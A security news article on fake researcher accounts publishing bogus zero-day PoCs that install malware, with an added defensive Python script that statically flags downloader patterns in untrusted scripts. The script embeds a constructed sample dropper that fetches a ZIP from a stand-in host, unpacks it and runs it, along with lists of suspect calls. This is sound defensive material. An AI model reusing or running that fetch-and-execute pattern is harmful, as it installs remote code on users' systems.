Fake Cyber Researchers Publish 0-day PoC’s to Push Malware

Since May, VulnCheck has observed hackers on Twitter and GitHub posing as cybersecurity researchers from ‘High Sierra Cyber Security’ and publishing fake proof-of-concept (PoC) exploits for supposed zero-day flaws in software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. Instead of demonstrating a vulnerability, the “exploits” infect Windows and Linux systems with malware.

The impersonators promote the GitHub repositories from Twitter and other social media accounts that look legitimate; the accounts impersonate real security researchers from Rapid7 and other security firms, even reusing their real headshots.

In all cases, the malicious repositories host a Python script that acts as a malware downloader, fetching a ZIP archive from an external URL onto the computer of the researcher who runs it.
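Before running any third-party “PoC”, a quick static read of the script is worth the minute it takes. The following is an added example (not VulnCheck’s tooling and not code from the campaign): it parses a Python file with the standard `ast` module, without executing it, and flags the fetch / unpack / execute stages that a downloader of the kind described above needs. The call-name tables, the `example.invalid` URL and the two embedded sample scripts are all constructed for illustration.

```python
"""Static triage of a 'proof-of-concept' Python script before anyone runs it.

Walks the AST and flags the three-stage downloader pattern described in the
article: fetch a remote file, unpack an archive, execute something.
Nothing in the analysed source is ever executed.
"""
import ast
import re
from dataclasses import dataclass, field

# Call names typical for each stage of a dropper (constructed rule set;
# extend to taste). Fully qualified after alias resolution below.
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get", "wget.download"}
UNPACK_CALLS = {"zipfile.ZipFile", "tarfile.open", "shutil.unpack_archive"}
EXEC_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
              "os.system", "os.startfile", "exec", "eval"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Finding:
    line: int
    stage: str     # "fetch", "unpack", "exec" or "url"
    detail: str


@dataclass
class TriageReport:
    findings: list = field(default_factory=list)

    @property
    def stages(self) -> set:
        return {f.stage for f in self.findings if f.stage != "url"}

    @property
    def verdict(self) -> str:
        # All three stages in one short script is the signature of a dropper,
        # not of a vulnerability proof-of-concept.
        if {"fetch", "unpack", "exec"} <= self.stages:
            return "likely-downloader"
        if self.stages:
            return "review"
        return "clean"


def _qualified_name(node: ast.AST) -> str:
    """Turn the callee of `a.b.c(...)` / `c(...)` into 'a.b.c' / 'c'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""          # callee is a call result, subscript, etc.


def triage_source(source: str) -> TriageReport:
    """Parse `source` (never executed) and collect downloader indicators."""
    report = TriageReport()
    tree = ast.parse(source)
    # Resolve `from x import y [as z]` and `import x as z` so that a bare
    # `ZipFile(...)` or `sp.run(...)` maps back to its real module path.
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.asname:
                    aliases[alias.asname] = alias.name
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _qualified_name(node.func)
            head, _, rest = name.partition(".")
            if head in aliases:
                name = aliases[head] + ("." + rest if rest else "")
            for stage, table in (("fetch", FETCH_CALLS),
                                 ("unpack", UNPACK_CALLS),
                                 ("exec", EXEC_CALLS)):
                if name in table:
                    report.findings.append(Finding(node.lineno, stage, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                report.findings.append(Finding(node.lineno, "url", url))
    return report


# Constructed sample with the shape the article describes; only ever parsed.
SAMPLE_DROPPER = '''
import urllib.request, zipfile, subprocess
data = urllib.request.urlopen("https://example.invalid/poc.zip").read()
open("poc.zip", "wb").write(data)
zipfile.ZipFile("poc.zip").extractall(".")
subprocess.run(["./poc"])
'''

# Constructed sample of what a genuine local PoC often looks like.
SAMPLE_BENIGN = '''
import struct
header = struct.pack("<I", 0x41414141)
open("crash.bin", "wb").write(header)
'''

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        rep = triage_source(src)
        print(label, rep.verdict)
        for f in rep.findings:
            print(f"  line {f.line}: {f.stage} -> {f.detail}")
```

The script is deliberately conservative: a single `zipfile` or `subprocess` call only yields `review`, because plenty of honest PoCs unpack a test file or spawn a target binary. What it will not do is give a pass to a ten-line “exploit” whose only real work is to pull a file from a URL and run it, which is exactly the shape VulnCheck reported.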

While the success of this campaign is still unknown, VulnCheck notes that the threat actors are persistent, creating new accounts and repositories when the existing ones are reported and removed.

Avkash Kathiriya, SVP of Research and Innovation at Cyware, had this to say:

   “Researchers, like the rest of us, need to take zero trust seriously. It’s worth repeating these security 101 tenets: Don’t download questionable files from GitHub. Don’t install any sample malware in a system that is not isolated. Don’t trust what you see on Twitter. If you spend all day researching threats and scam techniques, don’t be surprised when you become the target.”

This advice boils down to safe computing 101. Everyone needs to follow it so that we don’t get pwned by a threat actor, and that includes defenders who are trying to get ahead of threat actors.
